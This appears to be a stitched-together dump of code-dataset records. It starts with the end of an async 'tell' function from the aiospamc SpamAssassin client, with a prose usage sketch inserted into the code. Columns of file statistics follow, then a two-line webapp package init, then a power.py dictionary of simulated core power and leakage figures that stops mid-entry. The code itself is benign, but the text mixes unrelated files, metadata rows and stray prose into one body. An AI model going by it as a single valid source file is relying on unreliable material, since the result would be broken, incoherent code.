remove_action: Union[str, ActionOption] = None,
set_action: Union[str, ActionOption] = None,
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param message_class: Classify the message as 'spam' or 'ham'.
:param remove_action: Remove message class for message in database.
:param set_action: Set message class for message in database.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with "DidSet" and/or "DidRemove" headers along with the
actions that were taken.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
headers: Dict[str, Any] = {
"Message-class": MessageClassValue(MessageClassOption(message_class))
}
if remove_action:
headers["Remove"] = parse_set_remove_value(remove_action)
if set_action:
headers["Set"] = parse_set_remove_value(set_action)
req = Request("TELL", headers=headers, body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending TELL request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling tell function")
raise
context_logger.bind(response=response).success(
"Successfully completed tell function"
)
return response
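A quick usage sketch for the frontend functions above, assuming the aiospamc package is installed (so this module is importable as aiospamc.frontend, matching the file path) and a SPAMD service is listening on localhost:783; the host, port, and example message are illustrative only:
import asyncio

from aiospamc.frontend import check, ping


async def main() -> None:
    # PING takes no message body; a reachable daemon answers with "PONG".
    pong = await ping(host="localhost", port=783)
    print(pong)

    # CHECK sends the raw message bytes; per the docstring above, the response
    # carries a "Spam" header with the verdict and the score.
    message = b"From: user@example.com\r\nSubject: hello\r\n\r\nHi there\r\n"
    response = await check(message, host="localhost", port=783)
    print(response)


if __name__ == "__main__":
    asyncio.run(main())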
| 37.018362
| 98
| 0.690183
| 3,038
| 26,209
| 5.918038
| 0.071429
| 0.026698
| 0.020023
| 0.020468
| 0.935091
| 0.922465
| 0.915012
| 0.911174
| 0.908004
| 0.908004
| 0
| 0.002406
| 0.238811
| 26,209
| 707
| 99
| 37.070721
| 0.898797
| 0.002137
| 0
| 0.737463
| 0
| 0
| 0.104798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026549
| 0
| 0.050147
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45e7083424585f70c0bfd47d1f073c30c3749d19
| 59
|
py
|
Python
|
src/webapp/data/__init__.py
|
Ciprian15/DeepDoc
|
4ae22030db2a7081cb179e52ac6c1c896f528fb1
|
[
"MIT"
] | null | null | null |
src/webapp/data/__init__.py
|
Ciprian15/DeepDoc
|
4ae22030db2a7081cb179e52ac6c1c896f528fb1
|
[
"MIT"
] | null | null | null |
src/webapp/data/__init__.py
|
Ciprian15/DeepDoc
|
4ae22030db2a7081cb179e52ac6c1c896f528fb1
|
[
"MIT"
] | null | null | null |
from webapp.data import load
from webapp.data import update
| 29.5
| 30
| 0.847458
| 10
| 59
| 5
| 0.6
| 0.4
| 0.56
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 59
| 2
| 30
| 29.5
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
affdae3f21fb1244cb6df6978b23c239ff3f054d
| 68,617
|
py
|
Python
|
benchmarks/SimResults/Paper2_rr_spec_base/cmp_perlbenchbzip2gccbwaves/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/Paper2_rr_spec_base/cmp_perlbenchbzip2gccbwaves/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/Paper2_rr_spec_base/cmp_perlbenchbzip2gccbwaves/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0373927,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.232059,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.200288,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.377336,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.653409,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.374748,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.40549,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.342274,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.90845,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0378387,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0136787,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.11298,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.101162,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.150819,
'Execution Unit/Register Files/Runtime Dynamic': 0.114841,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.283251,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.742252,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.90002,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00291518,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00291518,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00254578,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000989163,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00145321,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00982934,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0277121,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.09725,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.18594,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.324832,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.330305,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.70926,
'Instruction Fetch Unit/Runtime Dynamic': 0.789928,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0775151,
'L2/Runtime Dynamic': 0.01304,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.52601,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.59394,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.106403,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.106403,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.03052,
'Load Store Unit/Runtime Dynamic': 2.22509,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.262373,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.524746,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.093117,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0941226,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.384619,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0537208,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.704099,
'Memory Management Unit/Runtime Dynamic': 0.147843,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.9915,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.13201,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0208834,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.194813,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.347706,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.42363,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0133598,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.213182,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0715596,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.164446,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.265245,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.133887,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.563578,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.177107,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.29584,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0135191,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00689761,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0549037,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.051012,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0684228,
'Execution Unit/Register Files/Runtime Dynamic': 0.0579096,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119007,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.318584,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55863,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00161133,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00161133,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00144666,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000583646,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000732792,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00540212,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
